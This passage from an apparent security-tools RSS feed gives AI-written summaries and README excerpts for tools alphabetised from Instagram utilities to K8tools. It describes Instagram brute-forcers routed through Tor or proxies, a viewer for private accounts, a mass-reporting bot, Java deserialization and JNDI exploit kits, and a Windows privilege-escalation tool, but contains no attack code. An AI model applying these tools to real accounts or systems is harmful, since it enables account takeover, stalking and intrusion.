&lt;p&gt;All in one Instagram hacking tool available (Insta information gathering, Insta brute force, Insta account auto repoter)&lt;/p&gt;</description></item><item><title>Instabruteforce</title><link>https://rainmana.github.io/hackyfeed/tools/hackertrackersj-instabruteforce/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hackertrackersj-instabruteforce/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Instabruteforce is a Python-based tool designed for brute-forcing Instagram accounts using a list of proxies. Its primary use case is to test account security by attempting to crack passwords from a supplied list, with features that include proxy management, statistics tracking, and customizable bot modes for varying performance. The program also incorporates a pruning system to optimize proxy usage by removing underperforming proxies from its database.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="instagram-bruter"&gt;Instagram Bruter&lt;/h1&gt;
&lt;p&gt;This program will brute force any Instagram account you send it its way given a list of proxies.&lt;/p&gt;</description></item><item><title>instagram_monitor</title><link>https://rainmana.github.io/hackyfeed/tools/misiektoja-instagram_monitor/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/misiektoja-instagram_monitor/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Instagram Monitor is a comprehensive OSINT tool designed for real-time tracking of Instagram activities, including post updates, follower changes, and profile modifications. Key features include interactive dashboards, anonymous media downloads, smart notifications via multiple channels, and enhanced privacy settings to simulate human behavior and avoid detection. This tool effectively provides insights into user engagement and media management, making it vital for social media analysts.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="instagram_monitor"&gt;instagram_monitor&lt;/h1&gt;
&lt;p align="left"&gt;
 &lt;img src="https://img.shields.io/github/v/release/misiektoja/instagram_monitor?style=flat-square&amp;color=blue" alt="GitHub Release" /&gt;
 &lt;img src="https://img.shields.io/pypi/v/instagram_monitor?style=flat-square&amp;color=teal" alt="PyPI Version" /&gt;
 &lt;img src="https://img.shields.io/github/stars/misiektoja/instagram_monitor?style=flat-square&amp;color=magenta" alt="GitHub Stars" /&gt;
 &lt;img src="https://img.shields.io/badge/python-3.9+-blueviolet?style=flat-square" alt="Python Versions" /&gt;
 &lt;img src="https://img.shields.io/github/license/misiektoja/instagram_monitor?style=flat-square&amp;color=blue" alt="License" /&gt;
 &lt;img src="https://img.shields.io/github/last-commit/misiektoja/instagram_monitor?style=flat-square&amp;color=green" alt="Last Commit" /&gt;
 &lt;img src="https://img.shields.io/badge/maintenance-active-brightgreen?style=flat-square" alt="Maintenance" /&gt;
&lt;/p&gt;</description></item><item><title>Instagram-Hacker</title><link>https://rainmana.github.io/hackyfeed/tools/importctf-instagram-hacker/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/importctf-instagram-hacker/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Instagram-Hacker is a Python script designed for performing bruteforce attacks on Instagram accounts. Its primary use case is to automate the process of testing multiple password combinations for a given username using predefined password lists. Notable features include the requirement for the mechanize and requests libraries, and the option to integrate with Tor for enhanced anonymity during the attack process.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="instagram-hacker"&gt;Instagram-Hacker&lt;/h1&gt;
&lt;p&gt;This is a script for Instagram bruteforce attacks. WARNING THIS IS A REAL TOOL!&lt;/p&gt;</description></item><item><title>InstagramPrivSniffer</title><link>https://rainmana.github.io/hackyfeed/tools/obitouka-instagramprivsniffer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/obitouka-instagramprivsniffer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; InstagramPrivSniffer is a digital investigation tool designed for accessing and analyzing posts from private Instagram accounts that are made visible through collaborations with public accounts. Notable features include the ability to download and view media from these private accounts, serving primarily as an OSINT resource for cybersecurity professionals. The tool is intended strictly for educational and research purposes, and its use should be approached with legal considerations in mind.&lt;/p&gt;</description></item><item><title>instahack</title><link>https://rainmana.github.io/hackyfeed/tools/evildevill-instahack/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/evildevill-instahack/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Instahack is a robust brute-force framework designed for testing Instagram accounts, utilizing Bash and Python for efficient password testing. It features multi-threading, Tor integration for anonymity, and customizable attack options, enabling users to conduct ethical penetration testing and OSINT gathering. The tool supports auto-resume capabilities and is optimized for high-volume password attempts.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;🚀 Instahack - Advanced Instagram Brute Force Framework&lt;/h1&gt;
&lt;p align="center"&gt;
 &lt;a href="https://instagram.com/blckspidr"&gt;&lt;img src="https://img.shields.io/badge/MADE%20IN-Pakistan-success?style=for-the-badge"&gt;&lt;/a&gt;
 &lt;a href="https://youtube.com/Hackerwasii"&gt;&lt;img src="https://img.shields.io/badge/Tool-Instahack-green?style=for-the-badge"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/evildevill/instahack"&gt;&lt;img src="https://img.shields.io/github/v/release/evildevill/instahack?style=for-the-badge"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/evildevill"&gt;&lt;img src="https://img.shields.io/badge/Maintained%3F-Yes-brightgreen?style=for-the-badge"&gt;&lt;/a&gt;
 &lt;img src="https://visitor-badge.laobi.icu/badge?page_id=HackerWaSi" alt="visitor badge"/&gt;
&lt;/p&gt;
&lt;p align="center"&gt;
 &lt;img width="60%" src="https://github.com/evildevill/instahack/blob/master/assets/20210219_144319.jpg" alt="Instahack Screenshot"/&gt;
&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="-about-instahack"&gt;🔍 About Instahack&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Instahack&lt;/strong&gt; is a high-performance Instagram brute-force tool crafted in Bash and Python, capable of testing millions of passwords efficiently. It uses &lt;strong&gt;Tor routing&lt;/strong&gt;, &lt;strong&gt;Instagram Android app signatures&lt;/strong&gt;, and &lt;strong&gt;customizable attack logic&lt;/strong&gt; for stealthy, anonymous operations.&lt;/p&gt;</description></item><item><title>instaloader</title><link>https://rainmana.github.io/hackyfeed/tools/instaloader-instaloader/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/instaloader-instaloader/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Instaloader is a command-line tool designed for downloading media from Instagram profiles, including photos, videos, stories, comments, and geotags. It supports both public and private profiles, offers features for handling profile name changes, and includes options for filtering and customizing download locations. Additionally, it allows users to efficiently update local copies of profiles and preserves session cookies for seamless access to private content.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;.. image:: &lt;a href="https://raw.githubusercontent.com/instaloader/instaloader/master/docs/logo_heading.png"&gt;https://raw.githubusercontent.com/instaloader/instaloader/master/docs/logo_heading.png&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;.. badges-start&lt;/p&gt;</description></item><item><title>Interlace</title><link>https://rainmana.github.io/hackyfeed/tools/codingo-interlace/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/codingo-interlace/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Interlace is a command-line tool designed to enhance single-threaded applications by enabling multi-threading capabilities, specifically for penetration testing and bug bounty workflows. It supports CIDR and glob notation for target specification and allows users to define multiple parameters such as timeouts, threads, and various command options, facilitating efficient execution across various targets. Notable features include the ability to pipe target lists, utilize multiple proxies, and specify complex command files for diverse testing scenarios.&lt;/p&gt;</description></item><item><title>inventory</title><link>https://rainmana.github.io/hackyfeed/tools/trickest-inventory/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/trickest-inventory/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Inventory is a tool designed for attack surface management of public bug bounty programs, aggregating DNS and web server data from over 800 organizations. Its primary use case is to assist bug bounty hunters in efficiently identifying and monitoring new assets while providing security teams with enhanced visibility into their assets. Notable features include automated data collection and transformation from multiple sources, duplicate program merging, and both passive and active enumeration workflows for comprehensive reconnaissance.&lt;/p&gt;</description></item><item><title>iOS</title><link>https://rainmana.github.io/hackyfeed/tools/ansjdnakjdnajkd-ios/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ansjdnakjdnajkd-ios/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The iOS/macOS penetration testing cheatsheet provides a curated list of tools and resources for conducting security assessments on iOS and macOS applications, including utilities for static analysis, obfuscation, and jailbreak checks. Notable features include links to tools such as MobSF, Frida, and Objection, facilitating the testing of application vulnerabilities across platforms. This repository serves as a comprehensive guide for security professionals looking to enhance their penetration testing workflows on Apple devices.&lt;/p&gt;</description></item><item><title>IP-Tracer</title><link>https://rainmana.github.io/hackyfeed/tools/rajkumardusad-ip-tracer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rajkumardusad-ip-tracer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; IP-Tracer is a command-line tool designed for Termux and Linux systems that allows users to track IP addresses by retrieving detailed information through the ip-api service. Its primary use case includes identifying the geographic and network details of both the user&amp;rsquo;s own IP address and that of other targets, with straightforward command syntax for operation. Notable features include installation ease, simple command-based usage, and the ability to gather IP data quickly.&lt;/p&gt;</description></item><item><title>IPA</title><link>https://rainmana.github.io/hackyfeed/tools/seekbytes-ipa/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/seekbytes-ipa/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Interactive PDF Analysis (IPA) is a graphical tool designed for researchers to deeply explore and analyze the contents of PDF files, particularly focusing on suspicious or potentially malicious documents. Key features include metadata extraction, structural examination of PDF objects, visualization of object references, and the ability to salvage information from corrupted files, all without requiring external dependencies. The tool aims to enhance user experience compared to traditional command-line analysis methods, facilitating a clearer understanding of the relationships among various document elements.&lt;/p&gt;</description></item><item><title>IPAPatch</title><link>https://rainmana.github.io/hackyfeed/tools/naituw-ipapatch/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/naituw-ipapatch/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; IPAPatch is a tool designed for patching iOS applications without the need for jailbreaking, enabling developers to inject custom code into third-party IPA files. Key features include the ability to debug applications using lldb, link external frameworks seamlessly, and generate modified distributable IPA files, allowing easy sharing of customized applications. This tool is particularly useful for developers looking to manipulate app behavior or integrate additional functionality within existing iOS apps.&lt;/p&gt;</description></item><item><title>ipdrone</title><link>https://rainmana.github.io/hackyfeed/tools/noob-hackers-ipdrone/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/noob-hackers-ipdrone/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Ipdrone is a Python-based tool designed for IP lookup and geolocation tracking, intended for use on both rooted and non-rooted Android devices via Termux. Notable features include real-time location tracking, ease of use for beginners, and consistent updates, enabling users to gather detailed information about specific IP addresses.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
&lt;a href="https://www.noob-hackers.com/"&gt;&lt;img title="Made in INDIA" src="https://img.shields.io/badge/MADE%20IN-INDIA-SCRIPT?colorA=%23ff8100&amp;colorB=%23017e40&amp;colorC=%23ff0000&amp;style=for-the-badge"&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;p align="center"&gt;
&lt;a href="https://www.noob-hackers.com/"&gt;&lt;img title="Made in INDIA" src="https://img.shields.io/badge/Tool-Ipdrone-green.svg"&gt;&lt;/a&gt;
&lt;a href="https://www.noob-hackers.com/"&gt;&lt;img title="Version" src="https://img.shields.io/badge/Version-1.0-green.svg?style=flat-square"&gt;&lt;/a&gt;
&lt;a href="https://www.noob-hackers.com/"&gt;&lt;img title="Maintainence" src="https://img.shields.io/badge/Maintained%3F-yes-green.svg"&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;p align="center"&gt;
&lt;a href="https://www.noob-hackers.com/"&gt;&lt;img title="Ipdrone" src="https://user-images.githubusercontent.com/49580304/96668887-f96ce580-1310-11eb-9849-2ee012aecdf5.jpg"&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;p align="center"&gt;
&lt;a href="https://github.com/noob-hackers"&gt;&lt;img title="Github" src="https://img.shields.io/badge/noob-hackers-brightgreen?style=for-the-badge&amp;logo=github"&gt;&lt;/a&gt;
&lt;a href="https://rebrand.ly/noobhackers"&gt;&lt;img title="YouTube" src="https://img.shields.io/badge/YouTube-Noob Hackers-red?style=for-the-badge&amp;logo=Youtube"&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;p align="center"&gt;
&lt;a href="https://github.com/noob-hackers"&gt;&lt;img title="Language" src="https://img.shields.io/badge/Made%20with-Bash-1f425f.svg?v=103"&gt;&lt;/a&gt;
&lt;a href="https://github.com/noob-hackers"&gt;&lt;img title="Followers" src="https://img.shields.io/github/followers/noob-hackers?color=blue&amp;style=flat-square"&gt;&lt;/a&gt;
&lt;a href="https://github.com/noob-hackers"&gt;&lt;img title="Stars" src="https://img.shields.io/github/stars/noob-hackers/ipdrone?color=red&amp;style=flat-square"&gt;&lt;/a&gt;
&lt;a href="https://github.com/noob-hackers"&gt;&lt;img title="Forks" src="https://img.shields.io/github/forks/noob-hackers/ipdrone?color=red&amp;style=flat-square"&gt;&lt;/a&gt;
&lt;a href="https://github.com/noob-hackers"&gt;&lt;img title="Watching" src="https://img.shields.io/github/watchers/noob-hackers/ipdrone?label=Watchers&amp;color=blue&amp;style=flat-square"&gt;&lt;/a&gt;
&lt;a href="https://github.com/noob-hackers"&gt;&lt;img title="Licence" src="https://img.shields.io/badge/License-MIT-blue.svg"&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="about-tool-"&gt;ABOUT TOOL :&lt;/h2&gt;
&lt;p&gt;Ipdrone is a simply python script, which can be used to Ip lookup and to get information of perticualr target Ip. This tool works on both rooted Android device and Non-rooted Android device.&lt;/p&gt;</description></item><item><title>IpHack</title><link>https://rainmana.github.io/hackyfeed/tools/mishakorzik-iphack/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mishakorzik-iphack/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; IpHack is a Python-based tool designed for tracking IP locations and performing network testing. Its primary use case includes determining the geographical location of IP addresses, checking proxy status, and gathering detailed device information based on IP, with notable features such as an enhanced design, the ability to search for IPs behind Cloudflare, and various inquiry methods for making requests. The tool can be easily installed via pip and offers functionalities to track both direct IP addresses and domains, as well as to verify proxies.&lt;/p&gt;</description></item><item><title>ipranges</title><link>https://rainmana.github.io/hackyfeed/tools/lord-alfred-ipranges/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/lord-alfred-ipranges/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; IPRanges is a tool that compiles and lists the IP address ranges for various cloud services and platforms, including Google, Amazon, Microsoft, and others. It provides separate text files for IPv4 and IPv6 addresses, categorized into unmerged and merged formats for efficiency. The dataset is updated daily and sourced from publicly available information, making it useful for network management and security configurations.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="ipranges"&gt;IPRanges&lt;/h1&gt;
&lt;p&gt;&lt;img src="logo.png" alt="IP Ranges"&gt;&lt;/p&gt;
&lt;p&gt;List all IP ranges from: Google (Cloud &amp;amp; GoogleBot), Bing (Bingbot), Amazon (AWS), Microsoft, Oracle (Cloud), DigitalOcean, GitHub, Facebook (Meta), Twitter, Linode, Telegram, OpenAI (GPTBot), CloudFlare, Vultr, Apple (Private Relay) and ProtonVPN with daily updates.&lt;/p&gt;</description></item><item><title>ivre</title><link>https://rainmana.github.io/hackyfeed/tools/ivre-ivre/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ivre-ivre/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; IVRE (Instrument de veille sur les réseaux extérieurs) is a comprehensive network reconnaissance framework designed for both passive and active reconnaissance. It integrates multiple data sources and tools such as Zeek, Nmap, and Masscan, enabling users to gather extensive information about networks efficiently. Notable features include a web interface for data visualization, support for various database backends, and a modular architecture that allows for easy integration of additional tools.&lt;/p&gt;</description></item><item><title>jadx-ai-mcp</title><link>https://rainmana.github.io/hackyfeed/tools/zinja-coder-jadx-ai-mcp/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/zinja-coder-jadx-ai-mcp/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; JADX-AI-MCP is a fully automated server and plugin designed for analyzing Android APK files via large language models (LLMs) such as Claude, enabling efficient vulnerability discovery, APK analysis, and reverse engineering. Key features include seamless MCC communication and integration with powerful LLMs to enhance static analysis and security assessments within the Android development ecosystem.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
&lt;h1 id="jadx-ai-mcp-part-of-zin-mcp-suite"&gt;JADX-AI-MCP (Part of Zin MCP Suite)&lt;/h1&gt;
&lt;p&gt;⚡ Fully automated MCP server + JADX plugin built to communicate with LLM through MCP to analyze Android APKs using LLMs like Claude — uncover vulnerabilities, analyze APK, and reverse engineer effortlessly.&lt;/p&gt;</description></item><item><title>jaeles</title><link>https://rainmana.github.io/hackyfeed/tools/jaeles-project-jaeles/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jaeles-project-jaeles/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Jaeles is a robust and extensible web application scanning framework developed in Go, designed to facilitate the creation of customized scanners for identifying vulnerabilities. Its primary use case is in the security assessment of web applications, featuring capabilities such as signature-based scanning, integration with Burp Suite, and extensive reporting options. Notable features include the ability to scan multiple URLs concurrently, customizable signature definitions, and Docker support for streamlined deployment.&lt;/p&gt;</description></item><item><title>jak-project</title><link>https://rainmana.github.io/hackyfeed/tools/open-goal-jak-project/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/open-goal-jak-project/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Jak Project is a tool designed to port the original Jak and Daxter trilogy from PS2 to PC by decompiling the game&amp;rsquo;s custom LISP language, GOAL, into a human-readable format. It features the development of a custom GOAL compiler for x86-64 architecture, along with tools to extract and modify game assets, ensuring high performance and compatibility with the original game&amp;rsquo;s mechanics, including live code modification during runtime. Users must have a legally obtained copy of the game, as the project does not include game assets.&lt;/p&gt;</description></item><item><title>Java-Deserialization-Cheat-Sheet</title><link>https://rainmana.github.io/hackyfeed/tools/grrrdog-java-deserialization-cheat-sheet/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/grrrdog-java-deserialization-cheat-sheet/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Java-Deserialization-Cheat-Sheet is a comprehensive resource designed for penetration testers and researchers focusing on deserialization vulnerabilities across various Java serialization libraries. It provides an extensive overview, including payload generators, exploit techniques, detection methods, and protection strategies across multiple serialization frameworks such as XStream, Jackson, and Kryo. Notably, the repository consolidates critical information and references, aiding professionals in identifying and exploiting Java deserialization weaknesses effectively.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="java-deserialization-cheat-sheet"&gt;Java-Deserialization-Cheat-Sheet&lt;/h1&gt;
&lt;p&gt;A cheat sheet for pentesters and researchers about deserialization vulnerabilities in various Java (JVM) serialization libraries.&lt;/p&gt;</description></item><item><title>JByteMod-Beta</title><link>https://rainmana.github.io/hackyfeed/tools/loerting-jbytemod-beta/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/loerting-jbytemod-beta/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; JByteMod-Beta is a multifunctional bytecode editor designed for manipulating Java bytecode with features such as syntax highlighting, live decompiling, and method graphing. Its primary use case is for developers seeking to analyze and edit Java .jar or .class files efficiently. Notable features include a plugin architecture for extending functionality, integration with popular decompilers like Procyon and Fernflower, and a user-friendly command-line interface.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="jbytemod-beta"&gt;JByteMod-Beta&lt;/h1&gt;
&lt;p&gt;JByteMod is a multifunctional bytecode editor with syntax highlighting and live decompiling and method graphing.
The successor of JByteMod: &lt;a href="https://github.com/GraxCode/Cafebabe"&gt;https://github.com/GraxCode/Cafebabe&lt;/a&gt;&lt;/p&gt;</description></item><item><title>jexboss</title><link>https://rainmana.github.io/hackyfeed/tools/joaomatosf-jexboss/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/joaomatosf-jexboss/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; JexBoss is a tool designed to test and exploit Java deserialization vulnerabilities primarily in JBoss Application Server and other Java platforms. It supports versions 3 to 6 of JBoss and is effective against a variety of frameworks and applications, utilizing exploitation vectors such as admin and JMX consoles, servlet deserialization, and specific vulnerabilities like CVE-2017-5638. Notable features include easy installation, support for multiple target applications, and demonstration videos for practical use cases.&lt;/p&gt;</description></item><item><title>JNDI-Injection-Exploit-Plus</title><link>https://rainmana.github.io/hackyfeed/tools/cckuailong-jndi-injection-exploit-plus/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cckuailong-jndi-injection-exploit-plus/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; JNDI-Injection-Exploit-Plus is a comprehensive tool designed for generating operational JNDI links, facilitating background services with RMI, LDAP, and HTTP servers to test vulnerabilities effectively. It enhances the functionality of standard JNDI exploit tools by offering additional remote and local reference gadgets, support for multiple JDK versions, and the capability to create base64 and hex payloads, making it a robust resource for security testing. With over 75 deserialization gadgets included, it provides a diverse set of options for vulnerability assessments.&lt;/p&gt;</description></item><item><title>jnitrace</title><link>https://rainmana.github.io/hackyfeed/tools/chame1eon-jnitrace/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/chame1eon-jnitrace/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; &lt;code&gt;jnitrace&lt;/code&gt; is a dynamic analysis tool designed to trace the usage of the JNI API in Android applications, leveraging the Frida framework for real-time monitoring. It simplifies the tracking of native library interactions, offering features such as customizable filtering options for method tracing, backtrace configuration, and the ability to save output in JSON format for further analysis. This tool enhances the reverse engineering process, making it more efficient by reducing the manual effort required to analyze JNI calls.&lt;/p&gt;</description></item><item><title>jok3r</title><link>https://rainmana.github.io/hackyfeed/tools/koutto-jok3r/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/koutto-jok3r/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Jok3r is a Python CLI application designed to assist penetration testers in executing automated network infrastructure and web security assessments. With over 50 integrated open-source tools, it streamlines vulnerability identification through context-aware checks, CVE lookups, and brute force attacks, all packaged within a Docker image for ease of use and customization. Notable features include automatic service fingerprinting, a comprehensive library of security checks for various network services, and automated post-authentication testing.&lt;/p&gt;</description></item><item><title>joomscan</title><link>https://rainmana.github.io/hackyfeed/tools/owasp-joomscan/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/owasp-joomscan/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OWASP JoomScan is an open-source vulnerability scanning tool designed specifically for Joomla CMS deployments, enabling automated detection of vulnerabilities and misconfigurations that could be exploited by attackers. Developed in Perl, it features a lightweight, modular architecture and provides a user-friendly interface with comprehensive reporting capabilities in both text and HTML formats. Notable features include component enumeration, version checks, firewall detection, and the ability to compile detailed reports to assist administrators in maintaining system security.&lt;/p&gt;</description></item><item><title>jsql-injection</title><link>https://rainmana.github.io/hackyfeed/tools/ron190-jsql-injection/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ron190-jsql-injection/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; jSQL Injection is a lightweight, open-source tool designed for identifying database information from servers, optimized for penetration testing. It is cross-platform, supporting Windows, Linux, and Mac with Java compatibility from versions 21 to 25, and is integrated into various security-focused distributions such as Kali Linux. Notable features include a user-friendly interface, support for multiple database engines, and comprehensive testing functionalities, making it suitable for both novice and experienced security analysts.&lt;/p&gt;</description></item><item><title>juice-shop</title><link>https://rainmana.github.io/hackyfeed/tools/juice-shop-juice-shop/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/juice-shop-juice-shop/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OWASP Juice Shop is a deliberately insecure web application designed for educational purposes such as security training, demonstrations, and Capture The Flag (CTF) events. It contains a wide range of vulnerabilities that align with the OWASP Top Ten, making it an effective tool for testing security tools and techniques. Notable features include its modern architecture, comprehensive vulnerability exposure, and support for various installation methods, including Docker and Vagrant.&lt;/p&gt;</description></item><item><title>juicy-potato</title><link>https://rainmana.github.io/hackyfeed/tools/ohpe-juicy-potato/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ohpe-juicy-potato/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Juicy Potato is a Local Privilege Escalation tool designed to exploit COM servers for escalating privileges from Windows Service Accounts to NT AUTHORITY\SYSTEM. Notable features include customizable CLSID targeting, flexible COM listening configurations (IP and port), and multiple process creation modes, enabling users to launch executables or scripts with different impersonation privileges. This tool is particularly effective for users with &lt;code&gt;SeImpersonate&lt;/code&gt; or &lt;code&gt;SeAssignPrimaryToken&lt;/code&gt; privileges, allowing them to bypass security mechanisms on Windows systems.&lt;/p&gt;</description></item><item><title>JustTryHarder</title><link>https://rainmana.github.io/hackyfeed/tools/sinfulz-justtryharder/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/sinfulz-justtryharder/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; JustTryHarder is a comprehensive cheat sheet designed to assist users in navigating the Penetration Testing with Kali Linux (PWK) course and preparing for the Offensive Security Certified Professional (OSCP) exam. It consolidates various penetration testing techniques, such as OS detection, privilege escalation, and exploitation methods, while providing clear examples and references. Notable features include a wide array of topics that cover essential hacking methodologies and tools, making it a valuable resource for both beginners and experienced practitioners in the cybersecurity field.&lt;/p&gt;</description></item><item><title>K8tools</title><link>https://rainmana.github.io/hackyfeed/tools/k8gege-k8tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/k8gege-k8tools/</guid><description>&lt;blockquote&gt;
